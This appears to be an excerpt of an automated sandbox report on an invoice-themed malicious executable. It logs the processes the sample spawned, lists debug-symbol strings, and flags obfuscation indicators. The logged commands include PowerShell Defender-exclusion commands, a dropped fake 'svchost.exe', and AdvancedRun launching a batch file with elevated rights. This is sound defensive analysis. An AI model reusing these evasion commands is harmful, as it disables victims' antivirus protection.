        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' -Force
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess created: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe' -Force
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe' /SpecialRun 4101d8 5380
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
        Source: C:\Windows\explorer.exeProcess created: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe'
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' -Force
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
        Source: C:\Windows\explorer.exeProcess created: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe'
        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5604 -ip 5604
        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 2060
        Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
        Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: unknown unknown
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: unknown unknown
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: unknown unknown
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: unknown unknown
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: unknown unknown
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: unknown unknown
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: unknown unknown
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: unknown unknown
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
        Source: CN-Invoice-XXXXX9808-19011143287990.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: CN-Invoice-XXXXX9808-19011143287990.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdbo source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534442041.0000000007F9F000.00000004.00000001.sdmp
        Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: System.ni.pdb% source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: crypt32.pdbb440 source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: onfiguration.ni.pdb source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: mscorlib.pdb>)^ source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000001E.00000003.354144153.00000000057E0000.00000004.00000040.sdmp
        Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: wntdll.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: ml.pdb source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: winnsi.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: .ni.pdb source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: clr.pdb source: WerFault.exe, 0000001E.00000003.354144153.00000000057E0000.00000004.00000040.sdmp
        Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: ility.pdb source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: advapi32.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: fwpuclnt.pdb\4B0 source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: ntmarta.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: urlmon.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: dhcpcsvc.pdbZ4\0 source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.pdb+_ source: WerFault.exe, 0000001E.00000003.353042308.00000000057F5000.00000004.00000040.sdmp
        Source: Binary string: System.ni.pdbT3Zl source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000001E.00000003.352878832.00000000057E2000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: winnsi.pdb03 source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534442041.0000000007F9F000.00000004.00000001.sdmp
        Source: Binary string: fltLib.pdbJ source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: cryptbase.pdb= source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: Microsoft.VisualBasic.pdb@! source: WERCCD7.tmp.dmp.30.dr
        Source: Binary string: \??\C:\Windows\mscorlib.pdb source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534442041.0000000007F9F000.00000004.00000001.sdmp
        Source: Binary string: dwmapi.pdbF source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: indows.Forms.pdb source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: i.pdb source: WerFault.exe, 0000001E.00000003.353586234.0000000005698000.00000004.00000001.sdmp
        Source: Binary string: dwmapi.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: indows.Forms.pdb&& source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: mscoree.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: iphlpapi.pdb@4V0 source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: ility.pdbn source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: shlwapi.pdbk source: WerFault.exe, 0000001E.00000003.352878832.00000000057E2000.00000004.00000040.sdmp
        Source: Binary string: msvcp_win.pdbR source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: nsi.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: psapi.pdbX source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: powrprof.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.ni.pdbRSDS source: WERCCD7.tmp.dmp.30.dr
        Source: Binary string: ole32.pdbT source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: ole32.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: iertutil.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: msasn1.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: WWCN-Invoice-XXXXX9808-19011143287990.PDB[[ source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.460006260.00000000004F8000.00000004.00000010.sdmp
        Source: Binary string: comctl32v582.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: System.Drawing.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: combase.pdb source: WerFault.exe, 0000001E.00000003.352878832.00000000057E2000.00000004.00000040.sdmp
        Source: Binary string: iVisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.460006260.00000000004F8000.00000004.00000010.sdmp
        Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WERCCD7.tmp.dmp.30.dr
        Source: Binary string: Accessibility.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: apphelp.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: System.Xml.ni.pdbRSDS source: WERCCD7.tmp.dmp.30.dr
        Source: Binary string: System.Configuration.pdb`Q) source: WERCCD7.tmp.dmp.30.dr
        Source: Binary string: rasadhlp.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: ml.ni.pdb source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: profapi.pdb` source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: System.Core.ni.pdbRSDSD source: WERCCD7.tmp.dmp.30.dr
        Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: diasymreader.pdb_ source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: Accessibility.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: shell32.pdb, source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: rawing.pdb source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: rasman.pdbN4P0 source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: mscoreei.pdbk source: WerFault.exe, 0000001E.00000003.352878832.00000000057E2000.00000004.00000040.sdmp
        Source: Binary string: version.pdbz source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: t.VisualBasic.pdb source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: Accessibility.pdb>)^ source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: shcore.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: Accessibility.pdbT source: WERCCD7.tmp.dmp.30.dr
        Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000001E.00000003.354144153.00000000057E0000.00000004.00000040.sdmp
        Source: Binary string: System.Core.ni.pdb" source: WerFault.exe, 0000001E.00000003.353586234.0000000005698000.00000004.00000001.sdmp
        Source: Binary string: fltLib.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: shell32.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: wimm32.pdb* source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: dnsapi.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: rasapi32.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: wimm32.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: diasymreader.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: winhttp.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: dhcpcsvc6.pdb>3 source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbgl source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534358038.0000000007F80000.00000004.00000001.sdmp
        Source: Binary string: rtutils.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: System.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: HcC:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.PDB4 source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.460006260.00000000004F8000.00000004.00000010.sdmp
        Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: profapi.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe, 00000008.00000000.260198849.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000027.00000000.419368466.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.22.dr
        Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000001E.00000003.354144153.00000000057E0000.00000004.00000040.sdmp
        Source: Binary string: WLDP.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: sechost.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: System.ni.pdbRSDS source: WERCCD7.tmp.dmp.30.dr
        Source: Binary string: clrjit.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: cryptsp.pdb?9W source: WerFault.exe, 0000001E.00000003.354208449.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: wUxTheme.pdbL source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: rasman.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: propsys.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdbows source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534442041.0000000007F9F000.00000004.00000001.sdmp
        Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534442041.0000000007F9F000.00000004.00000001.sdmp
        Source: Binary string: wmswsock.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: version.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: onfiguration.pdb source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: O.pdb? source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.460006260.00000000004F8000.00000004.00000010.sdmp
        Source: Binary string: wintrust.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: powrprof.pdb| source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: oleaut32.pdbn source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: System.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: iertutil.pdbV4H0 source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001E.00000003.354144153.00000000057E0000.00000004.00000040.sdmp
        Source: Binary string: psapi.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: bcrypt.pdbv source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: System.Drawing.pdb| source: WERCCD7.tmp.dmp.30.dr
        Source: Binary string: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.PDB source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.460006260.00000000004F8000.00000004.00000010.sdmp
        Source: Binary string: cldapi.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001E.00000003.352878832.00000000057E2000.00000004.00000040.sdmp
        Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000001E.00000003.352878832.00000000057E2000.00000004.00000040.sdmp
        Source: Binary string: System.Drawing.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: System.Core.pdb source: WerFault.exe, 0000001E.00000003.353586234.0000000005698000.00000004.00000001.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: combase.pdbk source: WerFault.exe, 0000001E.00000003.352878832.00000000057E2000.00000004.00000040.sdmp
        Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 0000001E.00000003.352878832.00000000057E2000.00000004.00000040.sdmp
        Source: Binary string: wuser32.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbgl0.Y source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534358038.0000000007F80000.00000004.00000001.sdmp
        Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbqR source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534358038.0000000007F80000.00000004.00000001.sdmp
        Source: Binary string: System.Xml.pdb@ source: WERCCD7.tmp.dmp.30.dr
        Source: Binary string: System.ni.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: edputil.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: crypt32.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp

        Data Obfuscation:

        barindex
        Binary contains a suspicious time stampShow sources
        Source: initial sampleStatic PE information: 0x8AB4D40F [Tue Sep 29 02:29:35 2043 UTC]
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeCode function: 8_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
        Source: CN-Invoice-XXXXX9808-19011143287990.exeStatic PE information: real checksum: 0x9f34 should be: 0x37eb0
        Source: svchost.exe.0.drStatic PE information: real checksum: 0x9f34 should be: 0x37eb0
